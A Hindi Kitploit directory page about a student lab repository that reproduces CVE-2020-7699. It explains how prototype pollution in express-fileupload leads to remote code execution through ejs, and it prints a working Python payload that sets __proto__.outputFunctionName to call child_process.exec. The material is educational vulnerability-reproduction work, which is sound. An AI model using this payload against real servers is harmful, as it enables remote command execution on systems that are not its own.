Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-7699_reproduce — CVE-2020-7699 का पुनरुत्पादन, सॉफ्टवेयर सुरक्षा सिद्धांत पाठ्यक्रम का बड़ा असाइनमेंट | Kitploit
उपकरण/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

CVE-2020-7699 का पुनरुत्पादन, सॉफ्टवेयर सुरक्षा सिद्धांत पाठ्यक्रम का बड़ा असाइनमेंट

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-7699 पुनरुत्पादन

Node.js RCE भेद्यता (CVE-2020-7699) का पुनरुत्पादन, मेरी प्रयोगशाला का कार्य

सेटअप

Node.js संस्करण: v14.16.1, कृपया सुनिश्चित करें कि Node.js का संस्करण 14 है (अन्य संस्करण शायद काम करेगा, मैंने परीक्षण नहीं किया)

Python संस्करण: 3.9.5, Python का उपयोग केवल HTTP हमला अनुरोध भेजने के लिए किया जाता है, किसी विशिष्ट संस्करण की आवश्यकता नहीं है

बस clone करें रिपॉजिटरी को, npm i चलाकर निर्भरताएँ स्थापित करें। मैंने 2 और कमांड दिए हैं:

  • npm run start-server का उपयोग करके लक्ष्य सर्वर (पीड़ित सर्वर) शुरू करें
  • npm run launch-attack का उपयोग करके हमला शुरू करें

विश्लेषण

express-fileUpload: 1.1.10 से नीचे का संस्करण प्रभावित होगा

express-fileUpload में प्रोटोटाइप प्रदूषण मौजूद है

भेद्यता: express-fileUpload प्रोटोटाइप प्रदूषण

इसका उपयोग कैसे करें: __proto__.outputFunctionName को प्रदूषित करें ताकि निष्पादित करने के लिए कमांड लिख सकें। उदाहरण: echo "ATTACK SUCCESSFUL" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

ejs में RCE मौजूद है

भेद्यता: ejs xxx.outputFunctionName को निष्पादित करने का प्रयास करेगा जो undefined है, लेकिन यदि object.outputFunctionName प्रदूषित है, तो वह इसके बजाय इसे निष्पादित करेगा

टूल डाउनलोड करें